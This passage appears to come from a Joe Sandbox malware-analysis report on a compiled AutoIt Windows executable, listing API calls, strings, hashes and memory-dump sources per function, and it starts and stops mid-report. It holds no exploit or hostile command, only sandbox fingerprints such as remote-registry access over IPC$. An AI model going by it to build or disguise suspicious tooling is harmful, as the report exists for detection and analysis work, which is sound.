                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                        • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                        • Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
                                                                                        • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0048B9CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17
                                                                                          • Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                                                                        • Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
                                                                                        • Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
                                                                                        • Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                        • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 2698844021-4113822522
                                                                                        • Opcode ID: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                        • Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
                                                                                        • Opcode Fuzzy Hash: c9c3f5bcbb85441f6b74d870dff76a731b9fa90bff3ae6885b825ce50aabd4a2
                                                                                        • Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0043E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0045F8DF
                                                                                        • LoadStringW.USER32(00000000,?,0043E029,00000001), ref: 0045F8E8
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0043E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0045F90A
                                                                                        • LoadStringW.USER32(00000000,?,0043E029,00000001), ref: 0045F90D
                                                                                        • __swprintf.LIBCMT ref: 0045F95D
                                                                                        • __swprintf.LIBCMT ref: 0045F96E
                                                                                        • _wprintf.LIBCMT ref: 0045FA17
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045FA2E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 984253442-2268648507
                                                                                        • Opcode ID: d323a42eacfa577a06e4697a5b07522abff3b97fa892fa224b21e0072cf2805f
                                                                                        • Instruction ID: b677be3246c54b3b75aebbff2f5f4dd64b3be6ce846d7ca24f480393c6b0c58e
                                                                                        • Opcode Fuzzy Hash: d323a42eacfa577a06e4697a5b07522abff3b97fa892fa224b21e0072cf2805f
                                                                                        • Instruction Fuzzy Hash: 92412072D04119AACF04FBE1DD46EEE7778AF14309F50047AB50576092EA396F09CB6A
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 0046DA10
                                                                                        • _wcscat.LIBCMT ref: 0046DA28
                                                                                        • _wcscat.LIBCMT ref: 0046DA3A
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0046DA4F
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DA63
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0046DA7B
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046DA95
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DAA7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
                                                                                        • GetFocus.USER32 ref: 0048C20C
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0048C217
                                                                                        • _memset.LIBCMT ref: 0048C342
                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
                                                                                        • GetMenuItemCount.USER32(?), ref: 0048C38D
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0047738F
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 004773A7
                                                                                        • SelectObject.GDI32(00000000,?), ref: 004773B4
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00477470
                                                                                        • DeleteObject.GDI32(?), ref: 00477479
                                                                                        • DeleteDC.GDI32(00000006), ref: 00477480
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0047748B
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        APIs
                                                                                          • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
                                                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
                                                                                          • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
                                                                                          • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462D50
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00462DDD
                                                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462E66
                                                                                        • DeleteMenu.USER32(004C5890,00000005,00000000,000000F5,?,?), ref: 00462EF6
                                                                                        • DeleteMenu.USER32(004C5890,00000004,00000000), ref: 00462EFE
                                                                                        • DeleteMenu.USER32(004C5890,00000006,00000000), ref: 00462F06
                                                                                        • DeleteMenu.USER32(004C5890,00000003,00000000), ref: 00462F0E
                                                                                        • GetMenuItemCount.USER32(004C5890), ref: 00462F16
                                                                                        • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 00462F4C
                                                                                        • GetCursorPos.USER32(?), ref: 00462F56
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00462F5F
                                                                                        • TrackPopupMenuEx.USER32(004C5890,00000000,?,00000000,00000000,00000000), ref: 00462F72
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00462F7E
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 004788D7
                                                                                        • CoInitialize.OLE32(00000000), ref: 00478904
                                                                                        • CoUninitialize.OLE32 ref: 0047890E
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00478A0E
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00478B3B
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00492C0C), ref: 00478B6F
                                                                                        • CoGetObject.OLE32(?,00000000,00492C0C,?), ref: 00478B92
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00478BA5
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00478C25
                                                                                        • VariantClear.OLEAUT32(?), ref: 00478C35
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID: ,,I
                                                                                        APIs
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • _memset.LIBCMT ref: 0045786B
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004578A0
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004578BC
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004578D8
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00457902
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0045792A
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00457935
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0045793A
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0043E2A0,00000010,?,Bad directive syntax error,0048F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0045F7C2
                                                                                        • LoadStringW.USER32(00000000,?,0043E2A0,00000010), ref: 0045F7C9
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • _wprintf.LIBCMT ref: 0045F7FC
                                                                                        • __swprintf.LIBCMT ref: 0045F81E
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0045F88D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1506413516-4153970271
                                                                                        APIs
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                          • Part of subcall function 00407924: _memmove.LIBCMT ref: 004079AD
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00465330
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00465346
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00465357
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00465369
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0046537A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2279737902-1007645807
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 208665112-3771769585
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00464F7A
                                                                                          • Part of subcall function 0042049F: timeGetTime.WINMM(?,75A8B400,00410E7B), ref: 004204A3
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00464FA6
                                                                                        • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00464FCA
                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00464FEC
                                                                                        • SetActiveWindow.USER32 ref: 0046500B
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00465019
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00465038
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00465043
                                                                                        • IsWindow.USER32 ref: 0046504F
                                                                                        • EndDialog.USER32(00000000), ref: 00465060
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046D5EA
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D67D
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 0046D691
                                                                                        • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004B8C1C,?), ref: 0046D6DD
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D74C
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0046D7A4
                                                                                        • _memset.LIBCMT ref: 0046D7E1
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0046D81D
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046D840
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0046D847
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046D87E
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 0046D880
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0045C283
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C295
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0045C2F3
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0045C2FE
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C310
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0045C364
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C372
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0045C383
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0045C3C6
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0045C3D4
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0045C3F1
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0045C3FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        APIs
                                                                                          • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004020D3
                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0040216E
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 0043BCA6
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCD7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BCEE
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004016CB,00000000,?,?,00401AE2,?,?), ref: 0043BD0A
                                                                                        • DeleteObject.GDI32(00000000), ref: 0043BD1C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        APIs
                                                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                        • GetSysColor.USER32(0000000F), ref: 004021D3
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046A90B
                                                                                        • GetDriveTypeW.KERNEL32(00000061,004B89A0,00000061), ref: 0046A9D5
                                                                                        • _wcscpy.LIBCMT ref: 0046A9FF
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 421087845-2263619337
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0048716A
                                                                                        • CreateMenu.USER32 ref: 00487185
                                                                                        • SetMenu.USER32(?,00000000), ref: 00487194
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
                                                                                        • IsMenu.USER32(?), ref: 00487237
                                                                                        • CreatePopupMenu.USER32 ref: 00487241
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
                                                                                        • DrawMenuBar.USER32 ref: 00487276
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 176399719-3044882817
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0048755E
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00487565
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00487578
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00487580
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0048758B
                                                                                        • DeleteDC.GDI32(00000000), ref: 00487594
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0048759E
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004875B2
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                                                                                        Strings
                                                                                        Similarity
